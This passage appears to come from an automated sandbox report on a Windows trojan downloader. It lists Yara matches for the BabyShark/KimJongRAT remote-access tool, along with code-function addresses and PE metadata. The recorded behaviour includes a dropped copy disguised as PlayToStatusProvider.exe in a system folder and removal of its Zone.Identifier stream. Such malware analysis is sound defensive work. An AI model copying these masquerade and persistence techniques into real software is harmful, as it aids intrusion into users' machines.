              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3c40000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3240000.4.raw.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0000000E.00000002.370666116.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.1.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.2.PlayToStatusProvider.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.2.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.1.PlayToStatusProvider.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,13_2_0040A5A9
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040A5A9 CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,DuplicateHandle,FindCloseChangeNotification,FindCloseChangeNotification,13_1_0040A5A9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeFile created: C:\Windows\SysWOW64\mmc\Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeFile deleted: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe:Zone.IdentifierJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0041608F0_2_0041608F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044C2A90_2_0044C2A9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045C34F0_2_0045C34F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044C77C0_2_0044C77C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045C8910_2_0045C891
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004528A00_2_004528A0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044CB500_2_0044CB50
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045CDD30_2_0045CDD3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044CF5C0_2_0044CF5C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045F36A0_2_0045F36A
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044D37C0_2_0044D37C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044944C0_2_0044944C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004574C20_2_004574C2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004594820_2_00459482
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045D4970_2_0045D497
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004036C00_2_004036C0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00409AF00_2_00409AF0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0041608F1_2_0041608F
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044C2A91_2_0044C2A9
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045C34F1_2_0045C34F
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044C77C1_2_0044C77C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045C8911_2_0045C891
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004528A01_2_004528A0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044CB501_2_0044CB50
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045CDD31_2_0045CDD3
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044CF5C1_2_0044CF5C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045F36A1_2_0045F36A
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044D37C1_2_0044D37C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044944C1_2_0044944C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004574C21_2_004574C2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004594821_2_00459482
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045D4971_2_0045D497
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004038A512_2_004038A5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040947012_2_00409470
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040123E12_2_0040123E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004010B412_2_004010B4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040C0BC12_2_0040C0BC
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_00409F5412_2_00409F54
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040832512_2_00408325
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004099E212_2_004099E2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040B1F712_2_0040B1F7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004038A512_1_004038A5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040947012_1_00409470
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040123E12_1_0040123E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004010B412_1_004010B4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040C0BC12_1_0040C0BC
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_00409F5412_1_00409F54
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040832512_1_00408325
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004099E212_1_004099E2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040B1F712_1_0040B1F7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_004360CE13_2_004360CE
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040509C13_2_0040509C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040519913_2_00405199
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0043C2D013_2_0043C2D0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0044040613_2_00440406
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040451D13_2_0040451D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_004045FF13_2_004045FF
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040458E13_2_0040458E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040469013_2_00404690
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00414A5113_2_00414A51
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00404C0813_2_00404C08
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00406C8E13_2_00406C8E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00415DF313_2_00415DF3
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00416E5C13_2_00416E5C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_00410FE413_2_00410FE4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040509C13_1_0040509C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040519913_1_00405199
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0043C2D013_1_0043C2D0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0044040613_1_00440406
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040451D13_1_0040451D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_004045FF13_1_004045FF
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040458E13_1_0040458E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040469013_1_00404690
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_00414A5113_1_00414A51
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_00404C0813_1_00404C08
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_00406C8E13_1_00406C8E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_00404DE514_2_00404DE5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_00404E5614_2_00404E56
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_00404EC714_2_00404EC7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_00404F5814_2_00404F58
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_0040BF6B14_2_0040BF6B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0044BCF4 appears 70 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 00401DD0 appears 74 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0041AB37 appears 48 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0044BE4C appears 55 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0044A596 appears 55 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0042D14D appears 42 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 0044BCC1 appears 252 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: String function: 00411990 appears 41 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0044BCF4 appears 57 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00401DD0 appears 74 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0041AB37 appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 004053C5 appears 34 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0040924D appears 31 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 004166E8 appears 34 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0042D14D appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00416A91 appears 88 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0044BCC1 appears 192 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00411990 appears 32 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00404880 appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00445190 appears 69 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00416849 appears 66 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 00412084 appears 39 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: String function: 0044BE4C appears 49 times
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273828829.0000000002450000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273828829.0000000002450000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000000.268247553.000000000048F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCodezBank.exeJ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273780766.00000000023F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeBinary or memory string: OriginalFilenameCodezBank.exeJ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0000000E.00000002.370666116.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 14.1.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, refere